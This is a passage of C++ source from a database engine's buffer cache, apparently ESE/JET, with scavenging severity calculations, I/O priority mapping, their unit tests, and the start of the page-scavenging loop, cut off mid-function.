CSemaphore g_semMaintScavenge( CSyncBasicInfo( _T( "g_semMaintScavenge" ) ) );
// We track the last several runs
TICK g_dtickMaintScavengeTimeout = 0;
size_t g_cScavengeTimeSeq = 0;
ULONG g_iScavengeLastRun = 0;
BFScavengeStats* g_rgScavengeLastRuns = NULL; // [ OnDebugOrRetailOrRtm( 150, 30, 4 ) ]; // should always be at least 1 ...
// We track a time sequence of the last OOB timeout seconds
ULONG g_iScavengeTimeSeqLast = 0;
BFScavengeStats* g_rgScavengeTimeSeq = NULL; // currently every 500 ms for either JET_paramHungIOThreshold (in RETAIL) or
// ( 2 * JET_paramHungIOThreshold ) (in DEBUG) + few extra runs.
// JET_paramHungIOThreshold's default is 30 seconds.
#ifndef RTM
// uses same g_iScavengeTimeSeqLast as g_rgScavengeTimeSeq
BFScavengeStats* g_rgScavengeTimeSeqCumulative = NULL;
#endif // !RTM
#ifdef DEBUG
BOOL g_modeExtraScavengingRuns = 0; // in mode = 0 or 1, no extra runs, mode 2 = 50% prob of extra run per iteration
#endif
// Tracking vars, to give us context on how cache size evolved.
LONG g_cCacheBoosts = 0;
__int64 g_cbCacheBoosted = 0;
// Determines the severity of current state of avail pool maintenance.
INLINE ULONG UlBFIMaintScavengeAvailPoolSev( const BFScavengeStats& stats )
{
Assert( stats.cbfAvailPoolTarget >= stats.cbfAvailPoolLow );
// Below low threshold, max severity.
if ( stats.cbfAvail < stats.cbfAvailPoolLow )
{
return ulMaintScavengeSevMax;
}
// Above target, min severity.
if ( stats.cbfAvail >= stats.cbfAvailPoolTarget )
{
return ulMaintScavengeSevMin;
}
// Unlikely, but just in in case.
if ( ( stats.cbfAvailPoolTarget - 1 ) <= stats.cbfAvailPoolLow )
{
return ulMaintScavengeSevMax - 1;
}
// Otherwise, scale linearly.
return ( ulMaintScavengeSevMin + 1 ) +
(ULONG)( ( ( (__int64)( ( ulMaintScavengeSevMax - 1 ) - ( ulMaintScavengeSevMin + 1 ) ) ) *
( (__int64)( ( stats.cbfAvailPoolTarget - 1 ) - stats.cbfAvail ) ) ) /
( (__int64)( ( stats.cbfAvailPoolTarget - 1 ) - stats.cbfAvailPoolLow ) ) );
}
#ifdef ENABLE_JET_UNIT_TEST
JETUNITTEST( BF, BufferScavengingAvailPoolSev )
{
BFScavengeStats stats = { 0 };
static_assert( ulMaintScavengeSevMin == 0, "ulMaintScavengeSevMin is assumed 0." );
static_assert( ulMaintScavengeSevMax == 1000, "ulMaintScavengeSevMax is assumed 1000." );
stats.cbfAvailPoolLow = 20000;
stats.cbfAvailPoolTarget = 30000;
// Available pool well below low threshold.
stats.cbfAvail = 1;
CHECK( 1000 == UlBFIMaintScavengeAvailPoolSev( stats ) );
// Available pool barely below low threshold.
stats.cbfAvail = 19999;
CHECK( 1000 == UlBFIMaintScavengeAvailPoolSev( stats ) );
// Available pool at low threshold.
stats.cbfAvail = 20000;
CHECK( 999 == UlBFIMaintScavengeAvailPoolSev( stats ) );
// Available pool 25% between low and target.
stats.cbfAvail = 22500;
CHECK( 749 == UlBFIMaintScavengeAvailPoolSev( stats ) );
// Available pool 50% between low and target.
stats.cbfAvail = 25000;
CHECK( 499 == UlBFIMaintScavengeAvailPoolSev( stats ) );
// Available pool 75% between low and target.
stats.cbfAvail = 27500;
CHECK( 250 == UlBFIMaintScavengeAvailPoolSev( stats ) );
// Available pool barely below target threshold.
stats.cbfAvail = 29999;
CHECK( 1 == UlBFIMaintScavengeAvailPoolSev( stats ) );
// Available pool at target threshold.
stats.cbfAvail = 30000;
CHECK( 0 == UlBFIMaintScavengeAvailPoolSev( stats ) );
// Available pool barely above target threshold.
stats.cbfAvail = 30001;
CHECK( 0 == UlBFIMaintScavengeAvailPoolSev( stats ) );
// Available pool well above target threshold.
stats.cbfAvail = 100000;
CHECK( 0 == UlBFIMaintScavengeAvailPoolSev( stats ) );
// Degenerated cases: target barely above low threshold.
stats.cbfAvailPoolLow = 20000;
stats.cbfAvailPoolTarget = 20001;
stats.cbfAvail = 19999;
CHECK( 1000 == UlBFIMaintScavengeAvailPoolSev( stats ) );
stats.cbfAvail = 20000;
CHECK( 999 == UlBFIMaintScavengeAvailPoolSev( stats ) );
stats.cbfAvail = 20001;
CHECK( 0 == UlBFIMaintScavengeAvailPoolSev( stats ) );
}
#endif // ENABLE_JET_UNIT_TEST
// Determines the severity of current state of shrink.
INLINE ULONG UlBFIMaintScavengeShrinkSev( const BFScavengeStats& stats )
{
// Shrink has just started, min severity.
if ( stats.dtickShrinkDuration == 0 )
{
return ulMaintScavengeSevMin;
}
const LONG dcbfShrinkDeficit = stats.cbfCacheSize - stats.cbfCacheTarget;
// No deficit, min severity.
if ( dcbfShrinkDeficit <= 0 )
{
return ulMaintScavengeSevMin;
}
// Target can be greater than initial shrink cache size if we've requested cache resize while running scavenging,
// and before reaching a previous shrink. In that case, most likely, the cache size will already be below
// the new target, but we'll handle it here to avoid divide by zero and other math issue below.
const LONG cbfCacheSizeStartShrink = LFunctionalMax( stats.cbfCacheSizeStartShrink, stats.cbfCacheTarget );
const LONG dcbfShrinkRange = cbfCacheSizeStartShrink - stats.cbfCacheTarget;
// The shrink target increases linearly as the time passes.
const __int64 cbfCacheSizeExpected = (__int64)cbfCacheSizeStartShrink -
( ( (__int64)dcbfShrinkRange ) * ( (__int64)stats.dtickShrinkDuration ) ) / ( (__int64)dtickMaintScavengeShrinkMax );
const LONG dcbfCacheSizeDiscrepancy = LFunctionalMin( stats.cbfCacheSize - (LONG)max( cbfCacheSizeExpected, 0 ), dcbfShrinkRange + 1 );
// Cache is already at or below expected size, min severity.
if ( dcbfCacheSizeDiscrepancy <= 0 )
{
return ulMaintScavengeSevMin;
}
// We're past due, max severity.
if ( dcbfCacheSizeDiscrepancy > dcbfShrinkRange )
{
return ulMaintScavengeSevMax;
}
// Othewrwise, scale linearly.
return ( ulMaintScavengeSevMin + 1 ) +
(ULONG)( ( ( (__int64)( ( ulMaintScavengeSevMax - 1 ) - ( ulMaintScavengeSevMin + 1 ) ) ) *
( (__int64)dcbfCacheSizeDiscrepancy ) ) / ( (__int64)dcbfShrinkRange ) );
}
#ifdef ENABLE_JET_UNIT_TEST
JETUNITTEST( BF, BufferScavengingShrinkSev )
{
BFScavengeStats stats = { 0 };
static_assert( ulMaintScavengeSevMin == 0, "ulMaintScavengeSevMin is assumed 0." );
static_assert( ulMaintScavengeSevMax == 1000, "ulMaintScavengeSevMax is assumed 1000." );
static_assert( dtickMaintScavengeShrinkMax == 30 * 1000, "ulMaintScavengeSevMax is assumed 30 * 1000." );
stats.cbfCacheSizeStartShrink = 30000;
stats.cbfCacheTarget = 20000;
// Severity is always 0 if we're just starting.
stats.dtickShrinkDuration = 0;
stats.cbfCacheSize = 15000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
stats.cbfCacheSize = 20000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
stats.cbfCacheSize = 25000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
stats.cbfCacheSize = 30000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
stats.cbfCacheSize = 35000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Severity is always 0 if there's no deficit.
stats.cbfCacheSize = 20000;
stats.dtickShrinkDuration = 15 * 1000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
stats.dtickShrinkDuration = 45 * 1000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
stats.cbfCacheSize = 10000;
stats.dtickShrinkDuration = 15 * 1000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
stats.dtickShrinkDuration = 45 * 1000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Duration 25% through, varying cache sizes.
//
stats.dtickShrinkDuration = 7500;
// Cache size still stuck at initial size.
stats.cbfCacheSize = 30000;
CHECK( 250 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size half of ideal progress.
stats.cbfCacheSize = 28750;
CHECK( 125 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache 10% above expected.
stats.cbfCacheSize = 27750;
CHECK( 25 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size making progress as expected.
stats.cbfCacheSize = 27500;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size ahead of expected.
stats.cbfCacheSize = 25000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Duration halfway through, varying cache sizes.
//
stats.dtickShrinkDuration = 15 * 1000;
// Cache size still stuck at initial size.
stats.cbfCacheSize = 30000;
CHECK( 500 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size half of ideal progress.
stats.cbfCacheSize = 27500;
CHECK( 250 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache 10% above expected.
stats.cbfCacheSize = 25500;
CHECK( 50 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size making progress as expected.
stats.cbfCacheSize = 25000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size ahead of expected.
stats.cbfCacheSize = 22500;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Duration 75% through, varying cache sizes.
//
stats.dtickShrinkDuration = 22500;
// Cache size still stuck at initial size.
stats.cbfCacheSize = 30000;
CHECK( 749 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size half of ideal progress.
stats.cbfCacheSize = 26250;
CHECK( 375 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache 10% above expected.
stats.cbfCacheSize = 23250;
CHECK( 75 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size making progress as expected.
stats.cbfCacheSize = 22500;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size ahead of expected.
stats.cbfCacheSize = 21000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Duration all the way through, varying cache sizes.
//
stats.dtickShrinkDuration = 30 * 1000;
// Cache size still stuck at initial size.
stats.cbfCacheSize = 30000;
CHECK( 999 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size half of ideal progress.
stats.cbfCacheSize = 25000;
CHECK( 500 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache 10% above target.
stats.cbfCacheSize = 21000;
CHECK( 100 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size exactly at target.
stats.cbfCacheSize = 20000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size lower than target.
stats.cbfCacheSize = 15000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Duration 1.5x past due, varying cache sizes.
//
stats.dtickShrinkDuration = 45 * 1000;
// Cache size still stuck at initial size.
stats.cbfCacheSize = 30000;
CHECK( 1000 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size half of ideal progress.
stats.cbfCacheSize = 25000;
CHECK( 999 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache 10% above target.
stats.cbfCacheSize = 21000;
CHECK( 599 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size exactly at target.
stats.cbfCacheSize = 20000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size lower than target.
stats.cbfCacheSize = 15000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Duration 2x past due, varying cache sizes.
//
stats.dtickShrinkDuration = 60 * 1000;
// Cache size still stuck at initial size.
stats.cbfCacheSize = 30000;
CHECK( 1000 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size half of ideal progress.
stats.cbfCacheSize = 25000;
CHECK( 1000 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache barely above target.
stats.cbfCacheSize = 20100;
CHECK( 1000 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size exactly at target.
stats.cbfCacheSize = 20000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size lower than target.
stats.cbfCacheSize = 15000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Duration way past due, varying cache sizes.
//
stats.dtickShrinkDuration = 240 * 1000;
// Cache size still stuck at initial size.
stats.cbfCacheSize = 30000;
CHECK( 1000 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size half of ideal progress.
stats.cbfCacheSize = 25000;
CHECK( 1000 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache 10% above target.
stats.cbfCacheSize = 21000;
CHECK( 1000 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size exactly at target.
stats.cbfCacheSize = 20000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size lower than target.
stats.cbfCacheSize = 15000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
}
#endif // ENABLE_JET_UNIT_TEST
// Determines the QOS of the scavenge-related I/O based on the current progress of buffer scavenging.
INLINE OSFILEQOS QosBFIMaintScavengePages( const ULONG_PTR ulIoPriority, const ULONG ulScavengeSev )
{
OSFILEQOS qosIoOsPriority = qosIOOSNormalPriority;
OSFILEQOS qosIoDispatch = qosIODispatchImmediate;
Assert( ( ulScavengeSev >= ulMaintScavengeSevMin ) && ( ulScavengeSev <= ulMaintScavengeSevMax ) );
// Maximum severity.
if ( ulScavengeSev == ulMaintScavengeSevMax )
{
goto HandleError;
}
// Determine OS priority.
if ( ( ulIoPriority & JET_IOPriorityLowForScavenge ) != 0 )
{
qosIoOsPriority = qosIOOSLowPriority;
}
// Determine dispatch urgency.
// Minimum severity.
if ( ulScavengeSev == ulMaintScavengeSevMin )
{
qosIoDispatch = qosIODispatchBackground;
goto HandleError;
}
// Othewrwise, scale linearly.
const INT iUrgentLevel =
qosIODispatchUrgentBackgroundLevelMin +
(INT)( ( ( (__int64)( qosIODispatchUrgentBackgroundLevelMax - qosIODispatchUrgentBackgroundLevelMin ) ) *
( (__int64)( ulScavengeSev - ( ulMaintScavengeSevMin + 1 ) ) ) ) / ( (__int64)( ( ulMaintScavengeSevMax - 1 ) - ( ulMaintScavengeSevMin + 1 ) ) ) );
qosIoDispatch = QosOSFileFromUrgentLevel( iUrgentLevel );
HandleError:
return ( qosIoDispatch | qosIoOsPriority );
}
#ifdef ENABLE_JET_UNIT_TEST
JETUNITTEST( BF, BufferScavengingSverityToQos )
{
ULONG_PTR ulIoPriority = 0;
ULONG ulScavengeSev = 0;
static_assert( ulMaintScavengeSevMin == 0, "ulMaintScavengeSevMin is assumed 0." );
static_assert( ulMaintScavengeSevMax == 1000, "ulMaintScavengeSevMax is assumed 1000." );
static_assert( qosIODispatchUrgentBackgroundLevelMin == 1, "qosIODispatchUrgentBackgroundLevelMin is assumed 1." );
static_assert( qosIODispatchUrgentBackgroundLevelMax == 127, "qosIODispatchUrgentBackgroundLevelMax is assumed 127." );
// Low I/O priority.
//
ulIoPriority = JET_IOPriorityLowForScavenge;
// Min severity.
ulScavengeSev = 0;
CHECK( ( qosIOOSLowPriority | qosIODispatchBackground ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
// Severity 1.
ulScavengeSev = 1;
CHECK( ( qosIOOSLowPriority | QosOSFileFromUrgentLevel( 1 ) ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
// Severity 250.
ulScavengeSev = 250;
CHECK( ( qosIOOSLowPriority | QosOSFileFromUrgentLevel( 32 ) ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
// Severity 500.
ulScavengeSev = 500;
CHECK( ( qosIOOSLowPriority | QosOSFileFromUrgentLevel( 64 ) ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
// Severity 750.
ulScavengeSev = 750;
CHECK( ( qosIOOSLowPriority | QosOSFileFromUrgentLevel( 95 ) ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
// Severity 999.
ulScavengeSev = 999;
CHECK( ( qosIOOSLowPriority | QosOSFileFromUrgentLevel( 127 ) ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
// Max severity.
ulScavengeSev = 1000;
CHECK( ( qosIOOSNormalPriority | qosIODispatchImmediate ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
// Normal I/O priority.
//
ulIoPriority = JET_IOPriorityNormal;
// Min severity.
ulScavengeSev = 0;
CHECK( ( qosIOOSNormalPriority | qosIODispatchBackground ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
// Severity 1.
ulScavengeSev = 1;
CHECK( ( qosIOOSNormalPriority | QosOSFileFromUrgentLevel( 1 ) ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
// Severity 250.
ulScavengeSev = 250;
CHECK( ( qosIOOSNormalPriority | QosOSFileFromUrgentLevel( 32 ) ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
// Severity 500.
ulScavengeSev = 500;
CHECK( ( qosIOOSNormalPriority | QosOSFileFromUrgentLevel( 64 ) ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
// Severity 750.
ulScavengeSev = 750;
CHECK( ( qosIOOSNormalPriority | QosOSFileFromUrgentLevel( 95 ) ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
// Severity 999.
ulScavengeSev = 999;
CHECK( ( qosIOOSNormalPriority | QosOSFileFromUrgentLevel( 127 ) ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
// Max severity.
ulScavengeSev = 1000;
CHECK( ( qosIOOSNormalPriority | qosIODispatchImmediate ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
}
#endif // ENABLE_JET_UNIT_TEST
// Scavenges pages from the cache to either replenish the avail pool or shrink the cache, or both.
// Scavenging can be done in both sync and async modes.
ERR ErrBFIMaintScavengeIScavengePages( const char* const szContextTraceOnly, const BOOL fSync )
{
// When scavenging is called inline/sync we should not do cleanup checking.
// Note: We hit several allocations in this path spread across both ErrBFIFlushPage and ErrBFIEvictPage ...
// FlushPage / CBFIssueList::ErrPrepareOper
// FlushPage / CPAGE::ErrCheckPage
// FlushPage / PioreqOSFileIIOREQAllocSlot (probably fixable b/c of endless alloc)
// EvictPage / RESMGR::CLRUKResourceUtilityManager<>::_PhistAllocHistory
const BOOL fCleanUpStateSaved = FOSSetCleanupState( fFalse );
Assert( g_semMaintScavenge.CAvail() == 0 /* we should own scavenging */ );
// Initially, we try to shrink/quiesce buffers straight from the avail pool itself. That
// is only attempted if the avail pool level is above its target (cbfAvailPoolTarget) and,
// of course, the cache size (cbfCacheSize) is above its target (cbfCacheTarget).
//
// After that, we scan the LRU-K, looking for victims to evict, to either replenish the
// avail pool or shrink the cache, or both. These are the stop conditions:
//
// 1- There's no avail pool or cache shrinkage deficit.
//
// 2- The number of pending-flush buffers hit the sum of the avail pool and cache shrinkage
// deficits. Note that we subtract the pending-flush buffers for which the write I/O
// is slow or hanging. It is assumed that pending-flush buffers will soon become clean
// and easy targets for eviction. Slow I/Os may complete at some point but they are
// still discounted so that buffer scavenging can become more aggressive as avail pool
// or cache shrinkage urgency increase and I/Os don't complete. Hung I/Os are considered
// permanent errors and, as such, must also be discounted from that number.
//
// 3- We only have cache shrinkage work to do, but we could not acquire the proper sync
// objects to perform eviction + quiescing.
//
// 4- We got errDiskTilt trying to flush a dirty buffer for eviction.
//
// 5- We went through all pages in the cache. If we hit this case and could not evict
// at least one page, either wrnSlow, JET_errOutOfBuffers or JET_errOutOfMemory will
// be returned.
// - wrnSlow is returned if we visited at least one buffer that could be potentially
// evicted in the future and the error when trying to flush was not OOM.
// - JET_errOutOfBuffers is returned if all buffers are in a state of permanent error
// (including hung I/Os) or we got OOM trying to flush them, except if all flush
// attempts resulted in OOM.
// - JET_errOutOfMemory is returned when all attemps to flush pages for eviction
// resulted in an out-of-memory condition.
// Init local vars.
//
BFScavengeStats statsCurrRun = { 0 };
BOOL fOwnCacheResizeCritSec = fFalse;
LONG_PTR cbfCacheAddressableInitial = -1;
LONG_PTR cbfCacheSizeInitial = -1;
PBF pbf = NULL;
// Init stats.
//
Assert( g_iScavengeLastRun < g_cScavengeLastRuns );
C_ASSERT( g_cScavengeLastRuns >= 1 );
AssumePREFAST( g_iScavengeLastRun < g_cScavengeLastRuns );
statsCurrRun.iRun = g_rgScavengeLastRuns[g_iScavengeLastRun].iRun + 1;
statsCurrRun.fSync = fSync;
statsCurrRun.tickStart = TickOSTimeCurrent();
// Shrink from the avail pool first.
//
if ( ( cbfCacheSize > cbfCacheTarget ) && ( g_bfavail.Cobject() > (DWORD)cbfAvailPoolHigh ) )
{
Assert( !fOwnCacheResizeCritSec );
fOwnCacheResizeCritSec = g_critCacheSizeResize.FTryEnter();
if ( fOwnCacheResizeCritSec )
{
cbfCacheAddressableInitial = cbfCacheAddressable;
cbfCacheSizeInitial = cbfCacheSize;
BFAvail::CLock lockAvail;
g_bfavail.BeginPoolScan( &lockAvail );
pbf = NULL;
while ( ( cbfCacheSize > cbfCacheTarget ) &&
( g_bfavail.Cobject() > (DWORD)cbfAvailPoolHigh ) &&
( g_bfavail.ErrGetNextObject( &lockAvail, &pbf ) == BFAvail::ERR::errSuccess ) )
{
Assert( !pbf->fInOB0OL && pbf->ob0ic.FUninitialized() );
if ( g_bfavail.ErrRemoveCurrentObject( &lockAvail ) == BFAvail::ERR::errSuccess )
{
pbf->sxwl.ClaimOwnership( bfltWrite );
BFIReleaseBuffer( pbf );
statsCurrRun.cbfShrinkFromAvailPool++;
}
}
g_bfavail.EndPoolScan( &lockAvail );
}
}
// Cache used cache size for asserting purposes.
OnDebug( CBF cbfCacheUsed = CbfBFICacheUsed() );
OnDebug( CBF cbfCacheUsedMin = cbfCacheUsed );
OnDebug( CBF cbfCacheUsedMax = cbfCacheUsed );
// Finally, scavenge from the LRU-K.
//
CBFIssueList bfil;
BFLRUK::ERR errLRUK = BFLRUK::ERR::errSuccess;
BFLRUK::CLock lockLRUK;
g_bflruk.BeginResourceScan( &lockLRUK );
OnDebug( const LONG cbfSuperColdedInitial = g_bflruk.CSuperColdSuccesses() );
pbf = NULL;
statsCurrRun.eStopReason = eScavengeInvalid;
while ( fTrue )
{
BFEvictFlags bfefReason = bfefReasonMax;
ULONG ulScavengeWriteSev = ulMax;
// Retrieve and sanitize target values: cache values so we're dealing with a static value,
// but only for one iteration of the function as we want to continue to respond to changes
// in globals from under us.
//
statsCurrRun.cbfCacheSize = (LONG)cbfCacheSize;
Assert( statsCurrRun.cbfCacheSize >= 0 );
statsCurrRun.cbfCacheTarget = (LONG)cbfCacheTarget;
Assert( statsCurrRun.cbfCacheTarget >= 0 );
statsCurrRun.cCacheBoosts = g_cCacheBoosts;
statsCurrRun.cbCacheBoosted = g_cbCacheBoosted;
const LONG_PTR cbfMaintCacheSizeStartedLast = g_cbfMaintCacheSizeStartedLast;
if ( cbfMaintCacheSizeStartedLast >= 0 )
{
statsCurrRun.cbfCacheSizeStartShrink = (LONG)cbfMaintCacheSizeStartedLast;
Assert( statsCurrRun.cbfCacheSizeStartShrink >= 0 );
statsCurrRun.dtickShrinkDuration = (TICK)LFunctionalMax( DtickDelta( g_tickMaintCacheSizeStartedLast, TickOSTimeCurrent() ), 0 );
}
else
{
statsCurrRun.cbfCacheSizeStartShrink = 0;
statsCurrRun.dtickShrinkDuration = 0;
}
statsCurrRun.cbfAvailPoolLow = (LONG)cbfAvailPoolLow;
Assert( statsCurrRun.cbfAvailPoolLow >= 0 );
statsCurrRun.cbfAvailPoolHigh = LFunctionalMax( statsCurrRun.cbfAvailPoolLow, (LONG)cbfAvailPoolHigh );
Assert( statsCurrRun.cbfAvailPoolHigh >= 0 );
Assert( statsCurrRun.cbfAvailPoolLow <= statsCurrRun.cbfAvailPoolHigh );
statsCurrRun.cbfAvailPoolTarget = LBound( (LONG)cbfAvailPoolTarget, statsCurrRun.cbfAvailPoolLow, statsCurrRun.cbfAvailPoolHigh );
Assert( statsCurrRun.cbfAvailPoolTarget >= 0 );
Assert( statsCurrRun.cbfAvailPoolLow <= statsCurrRun.cbfAvailPoolTarget );
Assert( statsCurrRun.cbfAvailPoolTarget <= statsCurrRun.cbfAvailPoolHigh );
statsCurrRun.cbfAvail = (LONG)g_bfavail.Cobject();
Assert( statsCurrRun.cbfAvail >= 0 );
// Calculate avail pool and cache shrink deficits.
const LONG_PTR dcbfAvailPoolDeficit = LpFunctionalMax( statsCurrRun.cbfAvailPoolHigh - statsCurrRun.cbfAvail, 0 );
const LONG_PTR dcbfShrinkDeficit = LpFunctionalMax( statsCurrRun.cbfCacheSize - statsCurrRun.cbfCacheTarget, 0 );
// Check for early criteria satisfaction
//
// Nothing to do.
if ( ( dcbfAvailPoolDeficit == 0 ) && ( dcbfShrinkDeficit == 0 ) )
{
statsCurrRun.eStopReason = eScavengeCompleted;
break;
}
// Nothing to do for now, because we hope to be able to evict enough pages
// to make up for our deficit soon.
Assert( statsCurrRun.cbfFlushPending >= ( statsCurrRun.cbfFlushPendingSlow + statsCurrRun.cbfFlushPendingHung ) );
if ( ( dcbfAvailPoolDeficit + dcbfShrinkDeficit ) <= ( statsCurrRun.cbfFlushPending - statsCurrRun.cbfFlushPendingSlow - statsCurrRun.cbfFlushPendingHung ) )
{
statsCurrRun.eStopReason = eScavengeCompletedPendingWrites;
break;
}
#ifdef DEBUG
// This increases dramatically the number of times we do scavenge pages, as we only free one
// page between passes. This allows a much higher rate of sync scavenging/eviction, and also
// thusly increases lockless-IO completion on foreground threads, so this is a great concurrency
// check. Surprisingly this doesn't seem to materially affect runtime in accept.
if ( g_modeExtraScavengingRuns == 0 )
{
if ( ( g_modeExtraScavengingRuns = (BOOL)UlConfigOverrideInjection( 37600, 0 ) ) == 0 )
{
g_modeExtraScavengingRuns = ( ( rand() % 4 ) == 3 ) ? 2 /* injection */ : 1 /* normal */; // only 25% chance of rain
}
}
if ( ( statsCurrRun.cbfAvail > 0 ) && // Avail pool is not totally depleted.
( statsCurrRun.dtickShrinkDuration <= ( dtickMaintScavengeShrinkMax / 10 ) ) && // Shrink has not been running for too long.
( ( rand() % g_modeExtraScavengingRuns ) != 0 ) &&
!FNegTest( fStrictIoPerfTesting ) )
{
statsCurrRun.eStopReason = eScavengeBailedRandomlyDebug;
break;
}
#endif
// Get next scavenge/eviction target.
//
errLRUK = g_bflruk.ErrGetNextResource( &lockLRUK, &pbf );
// No more objects, bail.
if ( errLRUK != BFLRUK::ERR::errSuccess )
{
Assert( errLRUK == BFLRUK::ERR::errNoCurrentResource );
statsCurrRun.eStopReason = eScavengeVisitedAllLrukEntries;
break;
}
statsCurrRun.cbfVisited++;
// Compute scavenge/flush severity.
//
// We only have shrink work to do.
if ( ( dcbfShrinkDeficit > 0 ) && ( dcbfAvailPoolDeficit == 0 ) )
{
fOwnCacheResizeCritSec = fOwnCacheResizeCritSec || g_critCacheSizeResize.FTryEnter();
// We could not acquire the resize critical section and there's no avail pool work to do,
// so bail.
if ( !fOwnCacheResizeCritSec )
{
statsCurrRun.eStopReason = eScavengeBailedExternalResize;
break;
}
bfefReason = bfefReasonShrink;
ulScavengeWriteSev = UlBFIMaintScavengeShrinkSev( statsCurrRun );
}
// We only have avail pool work to do.
else if ( ( dcbfAvailPoolDeficit > 0 ) && ( dcbfShrinkDeficit == 0 ) )
{
bfefReason = bfefReasonAvailPool;
ulScavengeWriteSev = UlBFIMaintScavengeAvailPoolSev( statsCurrRun );
}
// We have both avail pool and shrink work to do, pick the one with higher severity.
else
{
const ULONG ulScavengeWriteAvailPoolSev = UlBFIMaintScavengeAvailPoolSev( statsCurrRun );
const ULONG ulScavengeWriteShrinkSev = UlBFIMaintScavengeShrinkSev( statsCurrRun );
if ( ulScavengeWriteAvailPoolSev > ulScavengeWriteShrinkSev )
{
bfefReason = bfefReasonAvailPool;
}
else if ( ulScavengeWriteShrinkSev > ulScavengeWriteAvailPoolSev )
{
bfefReason = bfefReasonShrink;
}
else
{
// Same severity: for lower severities, pick shrink because avail pool maintenance is
// more accurately measured (directly related to user activity), so at higher severities,
// we know for sure we need to grow the avail pool.
if ( ulScavengeWriteAvailPoolSev <= ( ( ulMaintScavengeSevMin + ulMaintScavengeSevMax ) / 2 ) )
{
bfefReason = bfefReasonShrink;
}
else
{
bfefReason = bfefReasonAvailPool;
}
}
// Switch from shrink to avail pool if we don't have the proper critical section.
if ( ( bfefReason == bfefReasonShrink ) &&
!( fOwnCacheResizeCritSec = ( fOwnCacheResizeCritSec || g_critCacheSizeResize.FTryEnter() ) ) )
{
bfefReason = bfefReasonAvailPool;
}
ulScavengeWriteSev = ( bfefReason == bfefReasonShrink ) ? ulScavengeWriteShrinkSev : ulScavengeWriteAvailPoolSev;
}
// Cache global cache vars, if still uninitialized.
if ( ( bfefReason == bfefReasonShrink ) && ( cbfCacheAddressableInitial == -1 ) )
{
Assert( cbfCacheSizeInitial == -1 );
cbfCacheAddressableInitial = cbfCacheAddressable;
cbfCacheSizeInitial = cbfCacheSize;
}
// Attempt actual eviction.
//
BOOL fPermanentErr = fFalse;
BOOL fHungIO = fFalse;
Assert( ( bfefReason == bfefReasonAvailPool ) || ( bfefReason == bfefReasonShrink ) );
Assert( ( bfefReason != bfefReasonShrink ) || ( fOwnCacheResizeCritSec && ( cbfCacheAddressableInitial != -1 ) && ( cbfCacheSizeInitial != -1 ) ) );
const BFEvictFlags bfef = BFEvictFlags( bfefReason | ( ( bfefReason == bfefReasonShrink ) ? bfefQuiesce : bfefNone ) );
const ERR errEvict = ErrBFIEvictPage( pbf, &lockLRUK, bfef );
if ( errEvict >= JET_errSuccess )
{
if ( bfefReason == bfefReasonAvailPool )
{
statsCurrRun.cbfEvictedAvailPool++;
}
else
{
